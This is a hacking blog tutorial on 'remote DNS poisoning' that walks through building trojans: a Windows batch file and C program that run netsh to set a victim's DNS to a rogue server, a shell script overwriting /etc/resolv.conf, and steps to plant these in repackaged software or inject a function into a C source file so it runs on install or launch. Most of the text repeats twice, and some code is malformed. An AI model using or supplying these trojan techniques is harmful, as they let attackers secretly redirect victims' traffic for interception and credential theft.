This is our 3rd tutorial o DNS Poisoning. In this tut we will be talking about Internet DNS Poisoning also known as Remote DNS Poisoning.
In this type of DNS poisoning it can be done over a single or multiple victims no matter where your victim is in world, the primary DNS entries of his/her system can be poisoned using this method. For this type of DNS poisoning attack you'll have to setup a rouge DNS server somewhere with static IP address and also it hsould be in working condition. Methods of poisoning are different for Windows and Linux systems but happens with help of same entity that is Trojan file.
Here I will be showing you how to create DNS poisoning Trojans all you have to do is vector them.
For poisoning DNS of victim you must know name of his/her interface or name he/she has set for his/her internet connection. This condition is must for you to poison victim's DNS if you don't know their values then use default “Local Area Connection”. Now lets create a DNS spoofing Trojan Batch file.
Type following lines in notepad and save it with any name.bat.
netsh interface ip set dns “Local Area Connection” static xxx.xxx.xxx
Above command will set DNS server of victim to xxx.xxx.xxx.
You can change “Local Area Connection” by name of interface or connection if you know it, else always go with default. Now send that file to victim for poisoning his/her DNS entries.
If you don't want to send bat file because your victim might suspect it, then you can create an executable file by compiling following C program.
#include<stdio.h>
#include<stdlib.h>
int main()
{
char *str= “netsh interface ip set dns “Local Area Connection” static xxx.xxx.xxx”;
system(str);
return 0 ;
Linux and UNIX systems save DNS entries in /etc/resolv.conf folder by changing entries in this file can help you poison DNS in Linux and UNIX systems. Now get IP address of working DNS server and IP address of rouge DNS server set by you. Suppose IP address of rouge DNS is xxx.xxx.xxx and real DNS server is yyy.yyy.yyy. Then type following commands in a text file and save with .sh extension
echo “nameserver xxx.xxx.xxx” > /etc/resolv.conf
echo “nameserver xxx.xxx.xxx” >> /etc/resolv.conf
Now all you have to do is vector this file to victim. For vectoring it get any source code installation package from internet of an interesting software your victim can't deny to install in his/her system. Extract it and find a shell script in it, place anyname.sh in that folder, open target shell script in text editor and before it ends type following commands,
chmod +x change.sh
./change.sh
Pack it again and send to your victim for installation once he/she installs software from your source code he/she will be infected.
Now sometimes its difficult to find a shell script in package but what is not difficult to find is a C source file. So if you get problem with above method, find a C source file with several functions in it and create following new function in it.
void change12345()
{
char *str;
str= “echo “nameserver xxx.xxx.xxx” > /etc/resolv.conf”;
system(str);
str= “echo “nameserver yyy.yyy.yyy” >> /etc/resolv.conf”;
system(str);
return;
}
Now call this function in any other function before it returns something. Pack files again and send it to your victim, your file will execute every time when your victim will launch that program.
Also note that above exploits codes are really very basic, you can modify them according to your needs and if you think they are difficult to understand please get your hands on programming, even if you can understand basic programming you can write your own exploit codes. This is what we call the power of programming languages and why it is necessary to be a good programmer for being a good hacker
In this type of DNS poisoning it can be done over a single or multiple victims no matter where your victim is in world, the primary DNS entries of his/her system can be poisoned using this method. For this type of DNS poisoning attack you'll have to setup a rouge DNS server somewhere with static IP address and also it hsould be in working condition. Methods of poisoning are different for Windows and Linux systems but happens with help of same entity that is Trojan file.
Here I will be showing you how to create DNS poisoning Trojans all you have to do is vector them.
For Windows
For poisoning DNS of victim you must know name of his/her interface or name he/she has set for his/her internet connection. This condition is must for you to poison victim's DNS if you don't know their values then use default “Local Area Connection”. Now lets create a DNS spoofing Trojan Batch file.
Type following lines in notepad and save it with any name.bat.
netsh interface ip set dns “Local Area Connection” static xxx.xxx.xxx
Above command will set DNS server of victim to xxx.xxx.xxx.
You can change “Local Area Connection” by name of interface or connection if you know it, else always go with default. Now send that file to victim for poisoning his/her DNS entries.
If you don't want to send bat file because your victim might suspect it, then you can create an executable file by compiling following C program.
#include<stdio.h>
#include<stdlib.h>
int main()
{
char *str= “netsh interface ip set dns “Local Area Connection” static xxx.xxx.xxx”;
system(str);
return 0 ;
>For Linux and UNIX
Linux and UNIX systems save DNS entries in /etc/resolv.conf folder by changing entries in this file can help you poison DNS in Linux and UNIX systems. Now get IP address of working DNS server and IP address of rouge DNS server set by you. Suppose IP address of rouge DNS is xxx.xxx.xxx and real DNS server is yyy.yyy.yyy. Then type following commands in a text file and save with .sh extension
echo “nameserver xxx.xxx.xxx” > /etc/resolv.conf
echo “nameserver xxx.xxx.xxx” >> /etc/resolv.conf
Now all you have to do is vector this file to victim. For vectoring it get any source code installation package from internet of an interesting software your victim can't deny to install in his/her system. Extract it and find a shell script in it, place anyname.sh in that folder, open target shell script in text editor and before it ends type following commands,
chmod +x change.sh
./change.sh
Pack it again and send to your victim for installation once he/she installs software from your source code he/she will be infected.
Now sometimes its difficult to find a shell script in package but what is not difficult to find is a C source file. So if you get problem with above method, find a C source file with several functions in it and create following new function in it.
void change12345()
{
char *str;
str= “echo “nameserver xxx.xxx.xxx” > /etc/resolv.conf”;
system(str);
str= “echo “nameserver yyy.yyy.yyy” >> /etc/resolv.conf”;
system(str);
return;
}
Now call this function in any other function before it returns something. Pack files again and send it to your victim, your file will execute every time when your victim will launch that program.
Also note that above exploits codes are really very basic, you can modify them according to your needs and if you think they are difficult to understand please get your hands on programming, even if you can understand basic programming you can write your own exploit codes. This is what we call the power of programming languages and why it is necessary to be a good programmer for being a good hacker
0 comments:
Post a Comment
Got any doubts or feedbacks ?
Feel free to comment !